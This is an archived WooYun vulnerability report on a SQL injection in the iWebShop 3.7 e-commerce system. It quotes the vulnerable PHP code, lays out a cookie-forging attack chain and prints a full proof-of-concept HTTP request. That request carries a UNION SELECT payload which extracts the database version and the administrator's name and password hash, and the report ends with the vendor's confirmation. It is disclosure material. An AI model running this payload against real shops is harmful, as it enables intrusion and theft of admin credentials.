当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129457

漏洞标题:iwebshop 前台注入

相关厂商:www.jooyea.cn

漏洞作者: loopx9

提交时间:2015-07-30 15:24

修复时间:2015-10-30 07:04

公开时间:2015-10-30 07:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-01: 厂商已经确认,细节仅向厂商公开
2015-08-04: 细节向第三方安全合作伙伴开放
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

测试版本 :iwebshop 3.7.15071500

详细说明:

iwebshop 默认使用cookie加密保存用户信息,找到一处可以提交明文获取密文的地方,进而使用构造的密文来进行sql注入.
controllers\simple.php:

//用户登录
function login_act()
{
	$login_info = IFilter::act(IReq::get('login_info','post'));
	$password   = IReq::get('password','post');
	$remember   = IFilter::act(IReq::get('remember','post'));
	$autoLogin  = IFilter::act(IReq::get('autoLogin','post'));//通过post传入autoLogin
	$callback   = IFilter::act(IReq::get('callback'),'text');
		$message    = '';
		$password   = md5($password);
	if($login_info == '')
	{
		$message = '请填写用户名或者邮箱';
	}
		else if(!preg_match('|\S{6,32}|',$password))
	{
		$message = '密码格式不正确,请输入6-32个字符';
	}
	else
	{
		if($userRow = CheckRights::isValidUser($login_info,$password))
		{
				CheckRights::loginAfter($userRow);
				//记住帐号
				if($remember == 1)
				{
					ICookie::set('loginName',$login_info);
				}
				//自动登录
				if($autoLogin == 1) // "1xxoo" == 1 为真,提交 "1+payload"就能满足此条件
				{
					ICookie::set('autoLogin',$autoLogin); //写入cookie
				}
				......

此处$autoLogin没有长度限制,我们可以提交注入的payload获取相应的密文,由于受GPC限制,只能找数字类型注入。cookie中的user_id字段可以利用。
classes\checkrights.php:

public static function getUser()
{
	$user = array(
		'user_id'  => ISafe::get('user_id'), //user_id从cookie中取值后没有intval
		'username' => ISafe::get('username'),
		'head_ico' => ISafe::get('head_ico'),
		'user_pwd' => ISafe::get('user_pwd'),
	);
	if(self::isValidUser($user['username'],$user['user_pwd']))
	{
		return $user; //返回数组
	}
	else
	{
		ISafe::clear('user_id');
		ISafe::clear('username');
		ISafe::clear('head_ico');
		ISafe::clear('user_pwd');
		return null;
	}
}


与user_id相关的注入很多,找了一处可以直接回显的,controllers\ucenter.php:

public function order_detail()
{
    $id = IFilter::act(IReq::get('id'),'int');
    $orderObj = new order_class();
    $this->order_info = $orderObj->getOrderShow($id,$this->user['user_id']);//跟进getOrderShow函数
    if(!$this->order_info)
    {
    	IError::show(403,'订单信息不存在');
    }
    $this->redirect('order_detail',false);
}


classes\order_class.php:

public function getOrderShow($order_id,$user_id = 0)
{
	$where = 'id = '.$order_id;
	if($user_id !== 0)
	{
		$where .= ' and user_id = '.$user_id; //没有引号保护
	}
	$data = array();
	//获得对象
	$tb_order = new IModel('order');
 		$data = $tb_order->getObj($where); //进入查询
 		if($data)
 		{
 		......

漏洞证明:

在用户登录表单处手动增加autoLogin,提交登录后将得到的cookie替换掉user_id,然后访问http://www.xxoo.com/index.php?controller=ucenter&action=order_detail&id=1。
官网demo测试:

POST /simple/login_act HTTP/1.0
Host: shop.aircheng.com
Proxy-Connection: keep-alive
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://shop.aircheng.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://shop.aircheng.com/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: iweb_last_login=bbfc708980MDQ1NjEwNjA0MDE4YjMyNWY4ZWJiNz82NTEzOTUwZDU; iweb_captcha=ab9205c089MDU0MDk5MTU5MzYxYDE4MmcxYmZiMTQ0Mzg3OjU%2FZDA; iweb_user_id=2394b064b6NzAwODAwMDgwODQwYzMxNW85Y2NiOTc3MzE1OTA5bDA; iweb_username=262dbbf390MzEwNDg5MDYwODU5YTE3Mm4yZGJiMTM3MzE0PTQ9bTk; iweb_head_ico=9491f0b465MDI5NTkwNDAwOTY9YTMxPGY3ZGJiNzI3NzE0PjUwYzA; iweb_user_pwd=6a7a28a45aMDExMDA5OTMwMjs4YTYxPGY3bGRiMTA3MzE7OTU6YzE; iweb_safecode=fd9559c83fMzMwODEwNDA5NTlgOGY6OD02ZDMxYjI0ODMwYmI4MDEwNzc4MzYyZjQzMGRkMWM0M2Q%2FZDgyMTRkZTE5MWhjNw; iweb_shoppingcart=c28c6d45c3ODQwMjgwMDAwNjNlZDw1ZDY2MDUxMTQ5MTIxNTU4MmV7JmNmaW1zIjpSVCQmdHpvYXJhcCU6X1p%2B
callback=%2F&login_info=00&password=000000.&autoLogin=1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(user(),0x3a,version()),10,11,12,13,14,15,concat(admin_name,0x3a,password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 from iwebshop_admin limit 1#

1.jpg


编辑cookie使用iweb_autologin替换iweb_user_id然后访问:http://shop.aircheng.com/ucenter/order_detail?id=1

2.jpg

修复方案:

参数过滤

版权声明:转载请注明来源 loopx9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-01 07:03

厂商回复:

此漏洞已经在最新的4.0版本,还论坛的权限校验补丁中修复,感谢提交

最新状态:

暂无